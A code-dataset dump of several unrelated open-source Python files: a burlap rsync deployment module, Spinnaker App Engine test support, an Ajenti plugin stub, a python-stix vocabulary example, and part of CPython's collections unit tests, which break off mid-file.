text
stringlengths 4
1.02M
| meta
dict |
|---|---|
from __future__ import print_function
from burlap import Satchel
from burlap.constants import *
from burlap.decorators import task
from burlap.common import only_hostname
RSYNC = 'rsync'
#DEPRECATED: TODO: remove tarball functionality, and rename to CodeSatchel
class TarballSatchel(Satchel):
name = 'tarball'
def set_defaults(self):
self.env.clean = 1
self.env.gzip = 1
self.env.method = RSYNC
self.env.rsync_source_dir = 'src'
self.env.rsync_source_dirs = [] # This overrides rsync_source_dir
self.env.rsync_target_dir = None
self.env.rsync_target_host = '{user}@{host_string}:'
self.env.rsync_auth = '--rsh "ssh -t -o StrictHostKeyChecking=no -i {key_filename}"'
self.env.rsync_command_template = (
'rsync '
'--recursive --verbose --perms --times --links '
'--compress --copy-links {exclude_str} '
'--delete --delete-before --force '
'{rsync_auth} '
'{rsync_source_dir} '
'{rsync_target_host}{rsync_target_dir}'
)
self.env.exclusions = [
'*_local.py',
'*.pyc',
'*.svn',
'*.tar.gz',
'*.log',
'twistd.pid',
'*.sqlite',
]
self.env.dir = '.burlap/tarball_cache'
self.env.extra_dirs = []
self.env.perm_user = 'www-data'
self.env.perm_group = 'www-data'
self.env.perm_chmod = None
self.env.set_permissions = True
@property
def timestamp(self):
from burlap.common import get_last_modified_timestamp
r = self.local_renderer
fn = r.env.rsync_source_dir
if self.verbose:
print('tarball.fn:', fn)
return get_last_modified_timestamp(fn, ignore=[_ for _ in r.env.exclusions if '/' not in _])
@task
def changed(self):
lm = self.last_manifest
last_timestamp = lm.timestamp
current_timestamp = self.timestamp
self.vprint('last_timestamp:', last_timestamp)
self.vprint('current_timestamp:', current_timestamp)
ret = last_timestamp == current_timestamp
print('NO change' if ret else 'CHANGED!')
return ret
def record_manifest(self):
"""
Called after a deployment to record any data necessary to detect changes
for a future deployment.
"""
manifest = super(TarballSatchel, self).record_manifest()
manifest['timestamp'] = self.timestamp
return manifest
@task
def set_permissions(self):
r = self.local_renderer
if r.env.rsync_target_dir:
if r.env.perm_chmod:
r.sudo('chmod -R {perm_chmod} {rsync_target_dir}')
r.sudo('chown -R {perm_user}:{perm_group} {rsync_target_dir}')
def _run_rsync(self, src, dst):
print('rsync %s -> %s' % (src, dst))
r = self.local_renderer
r.env.hostname = only_hostname(r.genv.host_string)
real_rsync_target_dir = r.env.rsync_target_dir
try:
# Rsync to a temporary directory where we'll have full permissions.
tmp_dir = '/tmp/tmp_%s_%s' % (self.env.rsync_target_dir.replace('/', '_'), src.replace('/', '_'))
r.env.rsync_target_dir = tmp_dir
r.env.rsync_source_dir = src
r.local(self.env.rsync_command_template)
# Then rsync from the temp directory as sudo to complete the operation.
r.env.rsync_source_dir = tmp_dir+'/*'
r.env.rsync_target_dir = real_rsync_target_dir
r.env.rsync_target_host = ''
r.env.rsync_auth = ''
r.sudo(self.env.rsync_command_template)
finally:
r.env.rsync_target_dir = real_rsync_target_dir
@task
def deploy_rsync(self, *args, **kwargs):
r = self.local_renderer
# Confirm source directories.
src_dirs = list(self.env.rsync_source_dirs)
if not src_dirs:
src_dirs.append(self.env.rsync_source_dir)
# Confirm target directories.
assert self.env.rsync_target_dir
r.env.exclude_str = ' '.join('--exclude=%s' % _ for _ in self.env.exclusions)
for src_dir in src_dirs:
self._run_rsync(src=src_dir, dst=self.env.rsync_target_dir)
if self.env.set_permissions:
self.set_permissions()
@task(precursors=['gitchecker', 'packager', 'apache2', 'pip', 'user'])
def configure(self, *args, **kwargs):
if self.env.method == RSYNC:
self.deploy_rsync(*args, **kwargs)
tarball_satchel = TarballSatchel()
deploy = tarball_satchel.configure
|
{
"content_hash": "dd9764de1572401517affbd4a8efd53f",
"timestamp": "",
"source": "github",
"line_count": 150,
"max_line_length": 109,
"avg_line_length": 31.346666666666668,
"alnum_prop": 0.5767758400680562,
"repo_name": "chrisspen/burlap",
"id": "cc3c0143b11ceebd895aae70fcb0da13f716a344",
"size": "4702",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "burlap/tarball.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "722479"
},
{
"name": "Shell",
"bytes": "11659"
}
],
"symlink_target": ""
}
|
"""Google App Engine platform and testing support for SpinnakerTestScenario."""
import citest.gcp_testing as gcp
from spinnaker_testing.base_scenario_support import BaseScenarioPlatformSupport
class AppEngineScenarioSupport(BaseScenarioPlatformSupport):
"""Provides SpinnakerScenarioSupport for Google App Engine."""
@classmethod
def add_commandline_parameters(cls, scenario_class, builder, defaults):
"""Implements BaseScenarioPlatformSupport interface.
Args:
scenario_class: [class spinnaker_testing.SpinnakerTestScenario]
builder: [citest.base.ConfigBindingsBuilder]
defaults: [dict] Default binding value overrides.
This is used to initialize the default commandline parameters.
"""
#
# Operation Parameters
#
builder.add_argument(
'--spinnaker_appengine_account',
default=defaults.get('SPINNAKER_APPENGINE_ACCOUNT', None),
help='Spinnaker account name to use for test operations against'
'App Engine. Only used when managing resources on App Engine.')
#
# Observer parameters
#
builder.add_argument(
'--appengine_credentials_path',
default=defaults.get('APPENGINE_CREDENTIALS_PATH', None),
help='A path to the JSON file with credentials to use for observing'
' tests against Google App Engine. Defaults to the value set for'
'--gce_credentials_path, which defaults to application default'
' credentials.')
def __init__(self, scenario):
"""Constructor.
Args:
scenario: [SpinnakerTestScenario] The scenario being supported.
"""
super(AppEngineScenarioSupport, self).__init__("appengine", scenario)
bindings = scenario.bindings
if not bindings.get('APPENGINE_PRIMARY_MANAGED_PROJECT_ID'):
bindings['APPENGINE_PRIMARY_MANAGED_PROJECT_ID'] = (
scenario.agent.deployed_config.get(
'providers.appengine.primaryCredentials.project', None))
# Fall back on Google project and credentials.
if not bindings['APPENGINE_PRIMARY_MANAGED_PROJECT_ID']:
bindings['APPENGINE_PRIMARY_MANAGED_PROJECT_ID'] = (
bindings['GOOGLE_PRIMARY_MANAGED_PROJECT_ID'])
bindings['APPENGINE_CREDENTIALS_PATH'] = (
bindings['GCE_CREDENTIALS_PATH'])
def _make_observer(self):
"""Implements BaseScenarioPlatformSupport interface."""
bindings = self.scenario.bindings
if not bindings.get('APPENGINE_PRIMARY_MANAGED_PROJECT_ID'):
raise ValueError('There is no "appengine_primary_managed_project_id"')
return gcp.GcpAppengineAgent.make_agent(
scopes=gcp.APPENGINE_FULL_SCOPE,
credentials_path=bindings['APPENGINE_CREDENTIALS_PATH'],
default_variables={
'project': bindings['APPENGINE_PRIMARY_MANAGED_PROJECT_ID']})
|
{
"content_hash": "728cc2fc25ecf252f9b1a3960ad9a29f",
"timestamp": "",
"source": "github",
"line_count": 71,
"max_line_length": 79,
"avg_line_length": 40.028169014084504,
"alnum_prop": 0.6949331456720619,
"repo_name": "duftler/spinnaker",
"id": "5ecf767a9300ae5bfba873ed9d17d184d74c2e97",
"size": "3439",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "testing/citest/spinnaker_testing/appengine_scenario_support.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Dockerfile",
"bytes": "1832"
},
{
"name": "Go",
"bytes": "8690"
},
{
"name": "HTML",
"bytes": "614"
},
{
"name": "Jsonnet",
"bytes": "44273"
},
{
"name": "Makefile",
"bytes": "363"
},
{
"name": "Python",
"bytes": "1279646"
},
{
"name": "Shell",
"bytes": "185455"
},
{
"name": "Smarty",
"bytes": "2087"
}
],
"symlink_target": ""
}
|
from ajenti.api import *
from ajenti.plugins import *
info = PluginInfo(
title='Teamspeak',
icon='leaf',
dependencies=[
PluginDependency('main'),
PluginDependency('dashboard'),
],
)
def init():
import main
|
{
"content_hash": "91ef3aa7ef3890547527826e7f4a992d",
"timestamp": "",
"source": "github",
"line_count": 16,
"max_line_length": 38,
"avg_line_length": 15.375,
"alnum_prop": 0.6178861788617886,
"repo_name": "emcx/ajenti-ts",
"id": "dca968c0b9e386c3e8689177380c331d4fd04f1d",
"size": "246",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "__init__.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "1811"
},
{
"name": "Shell",
"bytes": "558"
}
],
"symlink_target": ""
}
|
"""
File: vocabstrings.py
Demonstrates uses of VocabString for STIX Controlled Vocabularies.
"""
from stix.core import STIXHeader
from stix.common.vocabs import VocabString, PackageIntent
def main():
# Create STIXHeader instance
header = STIXHeader()
header.package_intents.append(PackageIntent.TERM_INDICATORS)
# To add a Package_Intent value that exists outside of the
# PackageIntentVocab controlled vocabulary, we pass in an
# instance of VocabString.
#
# This will create a new Package_Intent field without an
# xsi:type and will not perform any validation of input terms.
#
# Passing in an instance of VocabString works for every
# ControlledVocabularyStringType field (or in python-stix,
# every VocabString field).
non_default_value = VocabString("NON STANDARD PACKAGE INTENT")
header.package_intents.append(non_default_value)
# Print XML!
print header.to_xml()
# NOTE: Passing in a str value that is not included in the list
# of default CV terms will raise a ValueError. This is why we pass
# in a VocabString instance.
#
# Example:
try:
msg = (
"[-] Attempting to add an str instance that does not exist "
"in the PackageIntent ALLOWED_VALUES list"
)
print(msg)
header.package_intents.append("THIS WILL THROW A VALUEERROR")
except Exception as ex:
print "[!] As expected, that failed. Here's the Exception message:"
print "[!]", str(ex)
if __name__ == '__main__':
main()
|
{
"content_hash": "4607cec8469ffa7ed7cc5c776d46eace",
"timestamp": "",
"source": "github",
"line_count": 51,
"max_line_length": 75,
"avg_line_length": 30.666666666666668,
"alnum_prop": 0.6751918158567775,
"repo_name": "STIXProject/python-stix",
"id": "6fd5f7f67955d3fbf9e13a33d25a876d8eb16167",
"size": "1691",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "examples/vocabstrings.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Python",
"bytes": "1422974"
}
],
"symlink_target": ""
}
|
"""Unit tests for collections.py."""
import collections
import copy
import doctest
import inspect
import operator
import pickle
from random import choice, randrange
from itertools import product, chain, combinations
import string
import sys
from test import support
import types
import unittest
from collections import namedtuple, Counter, OrderedDict, _count_elements
from collections import UserDict, UserString, UserList
from collections import ChainMap
from collections import deque
from collections.abc import Awaitable, Coroutine
from collections.abc import AsyncIterator, AsyncIterable, AsyncGenerator
from collections.abc import Hashable, Iterable, Iterator, Generator, Reversible
from collections.abc import Sized, Container, Callable, Collection
from collections.abc import Set, MutableSet
from collections.abc import Mapping, MutableMapping, KeysView, ItemsView, ValuesView
from collections.abc import Sequence, MutableSequence
from collections.abc import ByteString
class TestUserObjects(unittest.TestCase):
def _superset_test(self, a, b):
self.assertGreaterEqual(
set(dir(a)),
set(dir(b)),
'{a} should have all the methods of {b}'.format(
a=a.__name__,
b=b.__name__,
),
)
def _copy_test(self, obj):
# Test internal copy
obj_copy = obj.copy()
self.assertIsNot(obj.data, obj_copy.data)
self.assertEqual(obj.data, obj_copy.data)
# Test copy.copy
obj.test = [1234] # Make sure instance vars are also copied.
obj_copy = copy.copy(obj)
self.assertIsNot(obj.data, obj_copy.data)
self.assertEqual(obj.data, obj_copy.data)
self.assertIs(obj.test, obj_copy.test)
def test_str_protocol(self):
self._superset_test(UserString, str)
def test_list_protocol(self):
self._superset_test(UserList, list)
def test_dict_protocol(self):
self._superset_test(UserDict, dict)
def test_list_copy(self):
obj = UserList()
obj.append(123)
self._copy_test(obj)
def test_dict_copy(self):
obj = UserDict()
obj[123] = "abc"
self._copy_test(obj)
################################################################################
### ChainMap (helper class for configparser and the string module)
################################################################################
class TestChainMap(unittest.TestCase):
def test_basics(self):
c = ChainMap()
c['a'] = 1
c['b'] = 2
d = c.new_child()
d['b'] = 20
d['c'] = 30
self.assertEqual(d.maps, [{'b':20, 'c':30}, {'a':1, 'b':2}]) # check internal state
self.assertEqual(d.items(), dict(a=1, b=20, c=30).items()) # check items/iter/getitem
self.assertEqual(len(d), 3) # check len
for key in 'abc': # check contains
self.assertIn(key, d)
for k, v in dict(a=1, b=20, c=30, z=100).items(): # check get
self.assertEqual(d.get(k, 100), v)
del d['b'] # unmask a value
self.assertEqual(d.maps, [{'c':30}, {'a':1, 'b':2}]) # check internal state
self.assertEqual(d.items(), dict(a=1, b=2, c=30).items()) # check items/iter/getitem
self.assertEqual(len(d), 3) # check len
for key in 'abc': # check contains
self.assertIn(key, d)
for k, v in dict(a=1, b=2, c=30, z=100).items(): # check get
self.assertEqual(d.get(k, 100), v)
self.assertIn(repr(d), [ # check repr
type(d).__name__ + "({'c': 30}, {'a': 1, 'b': 2})",
type(d).__name__ + "({'c': 30}, {'b': 2, 'a': 1})"
])
for e in d.copy(), copy.copy(d): # check shallow copies
self.assertEqual(d, e)
self.assertEqual(d.maps, e.maps)
self.assertIsNot(d, e)
self.assertIsNot(d.maps[0], e.maps[0])
for m1, m2 in zip(d.maps[1:], e.maps[1:]):
self.assertIs(m1, m2)
# check deep copies
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
e = pickle.loads(pickle.dumps(d, proto))
self.assertEqual(d, e)
self.assertEqual(d.maps, e.maps)
self.assertIsNot(d, e)
for m1, m2 in zip(d.maps, e.maps):
self.assertIsNot(m1, m2, e)
for e in [copy.deepcopy(d),
eval(repr(d))
]:
self.assertEqual(d, e)
self.assertEqual(d.maps, e.maps)
self.assertIsNot(d, e)
for m1, m2 in zip(d.maps, e.maps):
self.assertIsNot(m1, m2, e)
f = d.new_child()
f['b'] = 5
self.assertEqual(f.maps, [{'b': 5}, {'c':30}, {'a':1, 'b':2}])
self.assertEqual(f.parents.maps, [{'c':30}, {'a':1, 'b':2}]) # check parents
self.assertEqual(f['b'], 5) # find first in chain
self.assertEqual(f.parents['b'], 2) # look beyond maps[0]
def test_ordering(self):
# Combined order matches a series of dict updates from last to first.
# This test relies on the ordering of the underlying dicts.
baseline = {'music': 'bach', 'art': 'rembrandt'}
adjustments = {'art': 'van gogh', 'opera': 'carmen'}
cm = ChainMap(adjustments, baseline)
combined = baseline.copy()
combined.update(adjustments)
self.assertEqual(list(combined.items()), list(cm.items()))
def test_constructor(self):
self.assertEqual(ChainMap().maps, [{}]) # no-args --> one new dict
self.assertEqual(ChainMap({1:2}).maps, [{1:2}]) # 1 arg --> list
def test_bool(self):
self.assertFalse(ChainMap())
self.assertFalse(ChainMap({}, {}))
self.assertTrue(ChainMap({1:2}, {}))
self.assertTrue(ChainMap({}, {1:2}))
def test_missing(self):
class DefaultChainMap(ChainMap):
def __missing__(self, key):
return 999
d = DefaultChainMap(dict(a=1, b=2), dict(b=20, c=30))
for k, v in dict(a=1, b=2, c=30, d=999).items():
self.assertEqual(d[k], v) # check __getitem__ w/missing
for k, v in dict(a=1, b=2, c=30, d=77).items():
self.assertEqual(d.get(k, 77), v) # check get() w/ missing
for k, v in dict(a=True, b=True, c=True, d=False).items():
self.assertEqual(k in d, v) # check __contains__ w/missing
self.assertEqual(d.pop('a', 1001), 1, d)
self.assertEqual(d.pop('a', 1002), 1002) # check pop() w/missing
self.assertEqual(d.popitem(), ('b', 2)) # check popitem() w/missing
with self.assertRaises(KeyError):
d.popitem()
def test_order_preservation(self):
d = ChainMap(
OrderedDict(j=0, h=88888),
OrderedDict(),
OrderedDict(i=9999, d=4444, c=3333),
OrderedDict(f=666, b=222, g=777, c=333, h=888),
OrderedDict(),
OrderedDict(e=55, b=22),
OrderedDict(a=1, b=2, c=3, d=4, e=5),
OrderedDict(),
)
self.assertEqual(''.join(d), 'abcdefghij')
self.assertEqual(list(d.items()),
[('a', 1), ('b', 222), ('c', 3333), ('d', 4444),
('e', 55), ('f', 666), ('g', 777), ('h', 88888),
('i', 9999), ('j', 0)])
def test_iter_not_calling_getitem_on_maps(self):
class DictWithGetItem(UserDict):
def __init__(self, *args, **kwds):
self.called = False
UserDict.__init__(self, *args, **kwds)
def __getitem__(self, item):
self.called = True
UserDict.__getitem__(self, item)
d = DictWithGetItem(a=1)
c = ChainMap(d)
d.called = False
set(c) # iterate over chain map
self.assertFalse(d.called, '__getitem__ was called')
def test_dict_coercion(self):
d = ChainMap(dict(a=1, b=2), dict(b=20, c=30))
self.assertEqual(dict(d), dict(a=1, b=2, c=30))
self.assertEqual(dict(d.items()), dict(a=1, b=2, c=30))
def test_new_child(self):
'Tests for changes for issue #16613.'
c = ChainMap()
c['a'] = 1
c['b'] = 2
m = {'b':20, 'c': 30}
d = c.new_child(m)
self.assertEqual(d.maps, [{'b':20, 'c':30}, {'a':1, 'b':2}]) # check internal state
self.assertIs(m, d.maps[0])
# Use a different map than a dict
class lowerdict(dict):
def __getitem__(self, key):
if isinstance(key, str):
key = key.lower()
return dict.__getitem__(self, key)
def __contains__(self, key):
if isinstance(key, str):
key = key.lower()
return dict.__contains__(self, key)
c = ChainMap()
c['a'] = 1
c['b'] = 2
m = lowerdict(b=20, c=30)
d = c.new_child(m)
self.assertIs(m, d.maps[0])
for key in 'abc': # check contains
self.assertIn(key, d)
for k, v in dict(a=1, B=20, C=30, z=100).items(): # check get
self.assertEqual(d.get(k, 100), v)
c = ChainMap({'a': 1, 'b': 2})
d = c.new_child(b=20, c=30)
self.assertEqual(d.maps, [{'b': 20, 'c': 30}, {'a': 1, 'b': 2}])
def test_union_operators(self):
cm1 = ChainMap(dict(a=1, b=2), dict(c=3, d=4))
cm2 = ChainMap(dict(a=10, e=5), dict(b=20, d=4))
cm3 = cm1.copy()
d = dict(a=10, c=30)
pairs = [('c', 3), ('p',0)]
tmp = cm1 | cm2 # testing between chainmaps
self.assertEqual(tmp.maps, [cm1.maps[0] | dict(cm2), *cm1.maps[1:]])
cm1 |= cm2
self.assertEqual(tmp, cm1)
tmp = cm2 | d # testing between chainmap and mapping
self.assertEqual(tmp.maps, [cm2.maps[0] | d, *cm2.maps[1:]])
self.assertEqual((d | cm2).maps, [d | dict(cm2)])
cm2 |= d
self.assertEqual(tmp, cm2)
# testing behavior between chainmap and iterable key-value pairs
with self.assertRaises(TypeError):
cm3 | pairs
tmp = cm3.copy()
cm3 |= pairs
self.assertEqual(cm3.maps, [tmp.maps[0] | dict(pairs), *tmp.maps[1:]])
# testing proper return types for ChainMap and it's subclasses
class Subclass(ChainMap):
pass
class SubclassRor(ChainMap):
def __ror__(self, other):
return super().__ror__(other)
tmp = ChainMap() | ChainMap()
self.assertIs(type(tmp), ChainMap)
self.assertIs(type(tmp.maps[0]), dict)
tmp = ChainMap() | Subclass()
self.assertIs(type(tmp), ChainMap)
self.assertIs(type(tmp.maps[0]), dict)
tmp = Subclass() | ChainMap()
self.assertIs(type(tmp), Subclass)
self.assertIs(type(tmp.maps[0]), dict)
tmp = ChainMap() | SubclassRor()
self.assertIs(type(tmp), SubclassRor)
self.assertIs(type(tmp.maps[0]), dict)
################################################################################
### Named Tuples
################################################################################
TestNT = namedtuple('TestNT', 'x y z') # type used for pickle tests
class TestNamedTuple(unittest.TestCase):
def test_factory(self):
Point = namedtuple('Point', 'x y')
self.assertEqual(Point.__name__, 'Point')
self.assertEqual(Point.__slots__, ())
self.assertEqual(Point.__module__, __name__)
self.assertEqual(Point.__getitem__, tuple.__getitem__)
self.assertEqual(Point._fields, ('x', 'y'))
self.assertRaises(ValueError, namedtuple, 'abc%', 'efg ghi') # type has non-alpha char
self.assertRaises(ValueError, namedtuple, 'class', 'efg ghi') # type has keyword
self.assertRaises(ValueError, namedtuple, '9abc', 'efg ghi') # type starts with digit
self.assertRaises(ValueError, namedtuple, 'abc', 'efg g%hi') # field with non-alpha char
self.assertRaises(ValueError, namedtuple, 'abc', 'abc class') # field has keyword
self.assertRaises(ValueError, namedtuple, 'abc', '8efg 9ghi') # field starts with digit
self.assertRaises(ValueError, namedtuple, 'abc', '_efg ghi') # field with leading underscore
self.assertRaises(ValueError, namedtuple, 'abc', 'efg efg ghi') # duplicate field
namedtuple('Point0', 'x1 y2') # Verify that numbers are allowed in names
namedtuple('_', 'a b c') # Test leading underscores in a typename
nt = namedtuple('nt', 'the quick brown fox') # check unicode input
self.assertNotIn("u'", repr(nt._fields))
nt = namedtuple('nt', ('the', 'quick')) # check unicode input
self.assertNotIn("u'", repr(nt._fields))
self.assertRaises(TypeError, Point._make, [11]) # catch too few args
self.assertRaises(TypeError, Point._make, [11, 22, 33]) # catch too many args
def test_defaults(self):
Point = namedtuple('Point', 'x y', defaults=(10, 20)) # 2 defaults
self.assertEqual(Point._field_defaults, {'x': 10, 'y': 20})
self.assertEqual(Point(1, 2), (1, 2))
self.assertEqual(Point(1), (1, 20))
self.assertEqual(Point(), (10, 20))
Point = namedtuple('Point', 'x y', defaults=(20,)) # 1 default
self.assertEqual(Point._field_defaults, {'y': 20})
self.assertEqual(Point(1, 2), (1, 2))
self.assertEqual(Point(1), (1, 20))
Point = namedtuple('Point', 'x y', defaults=()) # 0 defaults
self.assertEqual(Point._field_defaults, {})
self.assertEqual(Point(1, 2), (1, 2))
with self.assertRaises(TypeError):
Point(1)
with self.assertRaises(TypeError): # catch too few args
Point()
with self.assertRaises(TypeError): # catch too many args
Point(1, 2, 3)
with self.assertRaises(TypeError): # too many defaults
Point = namedtuple('Point', 'x y', defaults=(10, 20, 30))
with self.assertRaises(TypeError): # non-iterable defaults
Point = namedtuple('Point', 'x y', defaults=10)
with self.assertRaises(TypeError): # another non-iterable default
Point = namedtuple('Point', 'x y', defaults=False)
Point = namedtuple('Point', 'x y', defaults=None) # default is None
self.assertEqual(Point._field_defaults, {})
self.assertIsNone(Point.__new__.__defaults__, None)
self.assertEqual(Point(10, 20), (10, 20))
with self.assertRaises(TypeError): # catch too few args
Point(10)
Point = namedtuple('Point', 'x y', defaults=[10, 20]) # allow non-tuple iterable
self.assertEqual(Point._field_defaults, {'x': 10, 'y': 20})
self.assertEqual(Point.__new__.__defaults__, (10, 20))
self.assertEqual(Point(1, 2), (1, 2))
self.assertEqual(Point(1), (1, 20))
self.assertEqual(Point(), (10, 20))
Point = namedtuple('Point', 'x y', defaults=iter([10, 20])) # allow plain iterator
self.assertEqual(Point._field_defaults, {'x': 10, 'y': 20})
self.assertEqual(Point.__new__.__defaults__, (10, 20))
self.assertEqual(Point(1, 2), (1, 2))
self.assertEqual(Point(1), (1, 20))
self.assertEqual(Point(), (10, 20))
def test_readonly(self):
Point = namedtuple('Point', 'x y')
p = Point(11, 22)
with self.assertRaises(AttributeError):
p.x = 33
with self.assertRaises(AttributeError):
del p.x
with self.assertRaises(TypeError):
p[0] = 33
with self.assertRaises(TypeError):
del p[0]
self.assertEqual(p.x, 11)
self.assertEqual(p[0], 11)
@unittest.skipIf(sys.flags.optimize >= 2,
"Docstrings are omitted with -O2 and above")
def test_factory_doc_attr(self):
Point = namedtuple('Point', 'x y')
self.assertEqual(Point.__doc__, 'Point(x, y)')
Point.__doc__ = '2D point'
self.assertEqual(Point.__doc__, '2D point')
@unittest.skipIf(sys.flags.optimize >= 2,
"Docstrings are omitted with -O2 and above")
def test_field_doc(self):
Point = namedtuple('Point', 'x y')
self.assertEqual(Point.x.__doc__, 'Alias for field number 0')
self.assertEqual(Point.y.__doc__, 'Alias for field number 1')
Point.x.__doc__ = 'docstring for Point.x'
self.assertEqual(Point.x.__doc__, 'docstring for Point.x')
# namedtuple can mutate doc of descriptors independently
Vector = namedtuple('Vector', 'x y')
self.assertEqual(Vector.x.__doc__, 'Alias for field number 0')
Vector.x.__doc__ = 'docstring for Vector.x'
self.assertEqual(Vector.x.__doc__, 'docstring for Vector.x')
@support.cpython_only
@unittest.skipIf(sys.flags.optimize >= 2,
"Docstrings are omitted with -O2 and above")
def test_field_doc_reuse(self):
P = namedtuple('P', ['m', 'n'])
Q = namedtuple('Q', ['o', 'p'])
self.assertIs(P.m.__doc__, Q.o.__doc__)
self.assertIs(P.n.__doc__, Q.p.__doc__)
@support.cpython_only
def test_field_repr(self):
Point = namedtuple('Point', 'x y')
self.assertEqual(repr(Point.x), "_tuplegetter(0, 'Alias for field number 0')")
self.assertEqual(repr(Point.y), "_tuplegetter(1, 'Alias for field number 1')")
Point.x.__doc__ = 'The x-coordinate'
Point.y.__doc__ = 'The y-coordinate'
self.assertEqual(repr(Point.x), "_tuplegetter(0, 'The x-coordinate')")
self.assertEqual(repr(Point.y), "_tuplegetter(1, 'The y-coordinate')")
def test_name_fixer(self):
for spec, renamed in [
[('efg', 'g%hi'), ('efg', '_1')], # field with non-alpha char
[('abc', 'class'), ('abc', '_1')], # field has keyword
[('8efg', '9ghi'), ('_0', '_1')], # field starts with digit
[('abc', '_efg'), ('abc', '_1')], # field with leading underscore
[('abc', 'efg', 'efg', 'ghi'), ('abc', 'efg', '_2', 'ghi')], # duplicate field
[('abc', '', 'x'), ('abc', '_1', 'x')], # fieldname is a space
]:
self.assertEqual(namedtuple('NT', spec, rename=True)._fields, renamed)
def test_module_parameter(self):
NT = namedtuple('NT', ['x', 'y'], module=collections)
self.assertEqual(NT.__module__, collections)
def test_instance(self):
Point = namedtuple('Point', 'x y')
p = Point(11, 22)
self.assertEqual(p, Point(x=11, y=22))
self.assertEqual(p, Point(11, y=22))
self.assertEqual(p, Point(y=22, x=11))
self.assertEqual(p, Point(*(11, 22)))
self.assertEqual(p, Point(**dict(x=11, y=22)))
self.assertRaises(TypeError, Point, 1) # too few args
self.assertRaises(TypeError, Point, 1, 2, 3) # too many args
with self.assertRaises(TypeError): # wrong keyword argument
Point(XXX=1, y=2)
with self.assertRaises(TypeError): # missing keyword argument
Point(x=1)
self.assertEqual(repr(p), 'Point(x=11, y=22)')
self.assertNotIn('__weakref__', dir(p))
self.assertEqual(p, Point._make([11, 22])) # test _make classmethod
self.assertEqual(p._fields, ('x', 'y')) # test _fields attribute
self.assertEqual(p._replace(x=1), (1, 22)) # test _replace method
self.assertEqual(p._asdict(), dict(x=11, y=22)) # test _asdict method
try:
p._replace(x=1, error=2)
except ValueError:
pass
else:
self._fail('Did not detect an incorrect fieldname')
# verify that field string can have commas
Point = namedtuple('Point', 'x, y')
p = Point(x=11, y=22)
self.assertEqual(repr(p), 'Point(x=11, y=22)')
# verify that fieldspec can be a non-string sequence
Point = namedtuple('Point', ('x', 'y'))
p = Point(x=11, y=22)
self.assertEqual(repr(p), 'Point(x=11, y=22)')
def test_tupleness(self):
Point = namedtuple('Point', 'x y')
p = Point(11, 22)
self.assertIsInstance(p, tuple)
self.assertEqual(p, (11, 22)) # matches a real tuple
self.assertEqual(tuple(p), (11, 22)) # coercible to a real tuple
self.assertEqual(list(p), [11, 22]) # coercible to a list
self.assertEqual(max(p), 22) # iterable
self.assertEqual(max(*p), 22) # star-able
x, y = p
self.assertEqual(p, (x, y)) # unpacks like a tuple
self.assertEqual((p[0], p[1]), (11, 22)) # indexable like a tuple
with self.assertRaises(IndexError):
p[3]
self.assertEqual(p[-1], 22)
self.assertEqual(hash(p), hash((11, 22)))
self.assertEqual(p.x, x)
self.assertEqual(p.y, y)
with self.assertRaises(AttributeError):
p.z
def test_odd_sizes(self):
Zero = namedtuple('Zero', '')
self.assertEqual(Zero(), ())
self.assertEqual(Zero._make([]), ())
self.assertEqual(repr(Zero()), 'Zero()')
self.assertEqual(Zero()._asdict(), {})
self.assertEqual(Zero()._fields, ())
Dot = namedtuple('Dot', 'd')
self.assertEqual(Dot(1), (1,))
self.assertEqual(Dot._make([1]), (1,))
self.assertEqual(Dot(1).d, 1)
self.assertEqual(repr(Dot(1)), 'Dot(d=1)')
self.assertEqual(Dot(1)._asdict(), {'d':1})
self.assertEqual(Dot(1)._replace(d=999), (999,))
self.assertEqual(Dot(1)._fields, ('d',))
n = 5000
names = list(set(''.join([choice(string.ascii_letters)
for j in range(10)]) for i in range(n)))
n = len(names)
Big = namedtuple('Big', names)
b = Big(*range(n))
self.assertEqual(b, tuple(range(n)))
self.assertEqual(Big._make(range(n)), tuple(range(n)))
for pos, name in enumerate(names):
self.assertEqual(getattr(b, name), pos)
repr(b) # make sure repr() doesn't blow-up
d = b._asdict()
d_expected = dict(zip(names, range(n)))
self.assertEqual(d, d_expected)
b2 = b._replace(**dict([(names[1], 999),(names[-5], 42)]))
b2_expected = list(range(n))
b2_expected[1] = 999
b2_expected[-5] = 42
self.assertEqual(b2, tuple(b2_expected))
self.assertEqual(b._fields, tuple(names))
def test_pickle(self):
p = TestNT(x=10, y=20, z=30)
for module in (pickle,):
loads = getattr(module, 'loads')
dumps = getattr(module, 'dumps')
for protocol in range(-1, module.HIGHEST_PROTOCOL + 1):
q = loads(dumps(p, protocol))
self.assertEqual(p, q)
self.assertEqual(p._fields, q._fields)
self.assertNotIn(b'OrderedDict', dumps(p, protocol))
def test_copy(self):
p = TestNT(x=10, y=20, z=30)
for copier in copy.copy, copy.deepcopy:
q = copier(p)
self.assertEqual(p, q)
self.assertEqual(p._fields, q._fields)
def test_name_conflicts(self):
# Some names like "self", "cls", "tuple", "itemgetter", and "property"
# failed when used as field names. Test to make sure these now work.
T = namedtuple('T', 'itemgetter property self cls tuple')
t = T(1, 2, 3, 4, 5)
self.assertEqual(t, (1,2,3,4,5))
newt = t._replace(itemgetter=10, property=20, self=30, cls=40, tuple=50)
self.assertEqual(newt, (10,20,30,40,50))
# Broader test of all interesting names taken from the code, old
# template, and an example
words = {'Alias', 'At', 'AttributeError', 'Build', 'Bypass', 'Create',
'Encountered', 'Expected', 'Field', 'For', 'Got', 'Helper',
'IronPython', 'Jython', 'KeyError', 'Make', 'Modify', 'Note',
'OrderedDict', 'Point', 'Return', 'Returns', 'Type', 'TypeError',
'Used', 'Validate', 'ValueError', 'Variables', 'a', 'accessible', 'add',
'added', 'all', 'also', 'an', 'arg_list', 'args', 'arguments',
'automatically', 'be', 'build', 'builtins', 'but', 'by', 'cannot',
'class_namespace', 'classmethod', 'cls', 'collections', 'convert',
'copy', 'created', 'creation', 'd', 'debugging', 'defined', 'dict',
'dictionary', 'doc', 'docstring', 'docstrings', 'duplicate', 'effect',
'either', 'enumerate', 'environments', 'error', 'example', 'exec', 'f',
